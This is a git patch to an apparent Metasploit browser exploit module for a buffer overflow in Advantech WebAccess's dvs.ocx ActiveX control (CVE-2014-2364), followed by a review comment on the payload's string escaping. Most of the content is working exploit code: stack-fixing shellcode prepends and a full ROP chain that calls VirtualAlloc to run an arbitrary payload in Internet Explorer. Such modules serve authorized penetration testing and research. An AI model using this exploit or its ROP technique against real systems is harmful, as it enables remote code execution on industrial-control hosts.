From 80f02c2a0597d4b5595f8b266082df96dbc5d474 Mon Sep 17 00:00:00 2001
From: jvazquez-r7
Date: Tue, 16 Sep 2014 15:18:11 -0500
Subject: [PATCH] Make module ready to go

---
 .../advantech_webaccess_dvs_getcolor.rb | 149 ++++++++++--------
 1 file changed, 81 insertions(+), 68 deletions(-)

diff --git a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
index 48fdef4624..aebc3071fe 100644
--- a/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
+++ b/modules/exploits/windows/browser/advantech_webaccess_dvs_getcolor.rb
@@ -12,62 +12,72 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', - 'Description' => %q{ + 'Name' => 'Advantech WebAccess dvs.ocx GetColor Buffer Overflow', + 'Description' => %q{ This module exploits a buffer overflow vulnerability in Advantec WebAccess. The vulnerability exists in the dvs.ocx ActiveX control, where a dangerous call to sprintf can be reached with user controlled data through the GetColor function. - This module has been tested successfully on Windows 7 SP1 and IE 10. + This module has been tested successfully on Windows XP SP3 with IE6 and Windows + 7 SP1 with IE8 and IE 9. }, - 'License' => MSF_LICENSE, - 'Author' => + 'License' => MSF_LICENSE, + 'Author' => [ 'Unknown', # Vulnerability discovery 'juan vazquez' # Metasploit module ], - 'References' => + 'References' => [ ['CVE', '2014-2364'], ['ZDI', '14-255'], ['URL', 'http://ics-cert.us-cert.gov/advisories/ICSA-14-198-02'] ], - 'DefaultOptions' => + 'DefaultOptions' => { - 'InitialAutoRunScript' => 'migrate -f', + 'Retries' => false, + 'InitialAutoRunScript' => 'migrate -f' }, 'BrowserRequirements' => { - :source => /script|headers/i, - :os_name => Msf::OperatingSystems::WINDOWS, - :ua_name => /MSIE/i, - :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", - :method => "GetColor" + :source => /script|headers/i, + :os_name => Msf::OperatingSystems::WINDOWS, + :ua_name => /MSIE/i, + :ua_ver => lambda { |ver| Gem::Version.new(ver) < Gem::Version.new('10') }, + :clsid => "{5CE92A27-9F6A-11D2-9D3D-000001155641}", + :method => "GetColor" }, - 'Payload' => + 'Payload' => { - 'Space' => 2048, - 'StackAdjustment' => -3500, - 'DisableNopes' => true, - 'BadChars' => "\x00\x0a\x0d" + 'Space' => 4096, + 'DisableNops' => true, + 'BadChars' => "\x00\x0a\x0d\x5c", + # Patch the stack to execute the decoder... 
+ 'PrependEncoder' => "\x81\xc4\x9c\xff\xff\xff", # add esp, -100 + # Fix the stack again, this time better :), before the payload + # is executed. + 'Prepend' => "\x64\xa1\x18\x00\x00\x00" + # mov eax, fs:[0x18] + "\x83\xC0\x08" + # add eax, byte 8 + "\x8b\x20" + # mov esp, [eax] + "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 }, - 'Platform' => 'win', - 'Targets' => + 'Platform' => 'win', + 'Arch' => ARCH_X86, + 'Targets' => [ [ 'Automatic', { } ] ], - 'DefaultTarget' => 0, - 'DisclosureDate' => 'Jul 17 2014')) + 'DefaultTarget' => 0, + 'DisclosureDate' => 'Jul 17 2014')) end def on_request_exploit(cli, request, target_info) - p "#{target_info}" print_status("Requested: #{request.uri}") content = <<-EOS EOS 
@@ -76,54 +86,57 @@ test.GetColor("#{sploit}", 0); send_response_html(cli, content) end - def sploit - xpl = Rex::Text.pattern_create(61) #offset - - #xpl << "BBBB" # EIP :-) - xpl << [0x60014185].pack("V") # RET - xpl << "CCCCDDDD" - #xpl << (0x01..0x09).to_a.pack("C*") # ESP - #xpl << (0x0b..0x0c).to_a.pack("C*") - #xpl << (0x0e..0xff).to_a.pack("C*") - - # EDI = ESP (ptr to esp) - xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN - xpl << [0x6001087d].pack("V") # PUSH ESP # AND AL,10 # JNE IJL11+0X10485 (60010485) [BR=0] # POP EDI # POP ESI # POP EBP # POP EBX # POP ECX # RETN ** [ijl11.dll] ** | ascii {PAGE_EXECUTE_READ} - xpl << [0x41414141].pack("V") # esi - xpl << [0x60029f6c].pack("V") # ebp .data ijl11.dll - xpl << [0xfffffff8].pack("V") # ebx - xpl << [0xffffffff].pack("V") # ecx - - # ECX = 0 + def rop_payload(code) + xpl = rand_text_alphanumeric(61) # offset + xpl << [0x60014185].pack("V") # RET + xpl << rand_text_alphanumeric(8) + # EDX = flAllocationType (0x1000) + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0xffffffff].pack("V") # ecx value + xpl << [0x6002157e].pack("V") # POP EAX # RETN + xpl << [0x9ffdbf89].pack("V") # eax value + xpl << [0x60022b97].pack("V") # ADC EAX,60025078 # RETN + xpl << [0x60024ea4].pack("V") # MUL EAX,ECX # RETN 0x10 + # EBX = dwSize (0x1000) + xpl << [0x60018084].pack("V") # POP EBP # RETN + xpl << [0x41414141].pack("V") # padding + xpl << [0x41414141].pack("V") # padding + xpl << [0x41414141].pack("V") # padding + xpl << [0x41414141].pack("V") # padding + xpl << [0x60029f6c].pack("V") # .data ijl11.dll + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0x60023588].pack("V") # ECX => (&POP EBX # RETN) + xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret + # ECX = flProtect (0x40) xpl << [0x6002157e].pack("V") # POP EAX # RETN xpl << [0x60029f6c].pack("V") # .data ijl11.dll - xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX 
# RETN + xpl << [0x60012288].pack("V") # POP ECX # RETN + xpl << [0xffffffff].pack("V") # ecx value + 0x41.times do + xpl << [0x6001b8ec].pack("V") # INC ECX # MOV DWORD PTR DS:[EAX],ECX # RETN + end + # EAX = ptr to &VirtualAlloc() + xpl << [0x6001db7e].pack("V") # POP EAX # RETN [ijl11.dll] + xpl << [0x600250c8].pack("V") # ptr to &VirtualAlloc() [IAT ijl11.dll] + # EBP = POP (skip 4 bytes) + xpl << [0x6002054b].pack("V") # POP EBP # RETN + xpl << [0x6002054b].pack("V") # ptr to &(# pop ebp # retn) + # ESI = ptr to JMP [EAX] + xpl << [0x600181cc].pack("V") # POP ESI # RETN + xpl << [0x6002176e].pack("V") # ptr to &(# jmp[eax]) + # EDI = ROP NOP (RETN) + xpl << [0x60021ad1].pack("V") # POP EDI # RETN + xpl << [0x60021ad2].pack("V") # ptr to &(retn) + # ESP = lpAddress (automatic) + # PUSHAD # RETN + xpl << [0x60018399].pack("V") # PUSHAD # RETN + xpl << [0x6001c5cd].pack("V") # ptr to &(# push esp # retn) + xpl << code - # eax = 0x40 - xpl << [0x600180ce].pack("V") # XOR EAX,EAX # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN - xpl << [0x600243ac].pack("V") # ADD EAX,0C # RETN + xpl.gsub!("\"", "\\\"") # Escape double quote, to not break javascript string + xpl.gsub!("\\", "\\\\") # Escape back slash, to avoid javascript escaping - # edx = 0x40 - xpl << [0x6001f0ec].pack("V") # XOR EDX,EDX # RETN - xpl << [0x60024eb6].pack("V") # ADD EBX,EAX # MOV EAX,DWORD PTR SS:[ESP+8] # MUL EAX,ECX # ADD EDX,EBX # POP EBX # RETN 0x10 - xpl << [0x41414141].pack("V") - - # set VirtualAlloc stack and call! 
- xpl << [0x60014184].pack("V") # POP ECX # RETN - xpl << [0x41414141].pack("V") - xpl << [0x41414141].pack("V") - xpl << [0x41414141].pack("V") - xpl << [0x41414141].pack("V") - xpl << [0x60022653].pack("V") # (ecx => VirtualAlloc) (EDI ptr to address) - xpl << [0x6001f1c8].pack("V") # push edx # or al,39h # push ecx # or byte ptr [ebp+5], dh # mov eax, 1 # ret - xpl << "A" * 1000 - - xpl.gsub("\"", "\\\"") # Escape double quote, to not break javascript string + xpl end end
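Review bot: The backslash escaping at the end of rop_payload is a no-op: in a String replacement argument Ruby treats `\\` as the escape for one literal backslash, so `xpl.gsub!("\\", "\\\\")` replaces each backslash with a single backslash. To actually double them use the block form, and run it before the quote escaping so the backslash it emits is not re-escaped by the later call: `xpl.gsub!("\\") { "\\\\" }` then `xpl.gsub!("\"", "\\\"")`. In practice the only escape-sensitive bytes in the buffer are the 0x22 bytes in gadget addresses such as `[0x60012288].pack("V")`, since `\x5c` is in BadChars and the filler appears to be alphanumeric, which is presumably why the dead line has gone unnoticed. A one-line comment above `def rop_payload(code)` stating that the result is interpolated into the `test.GetColor("...")` JavaScript string and must be string-safe would document why the escaping exists at all.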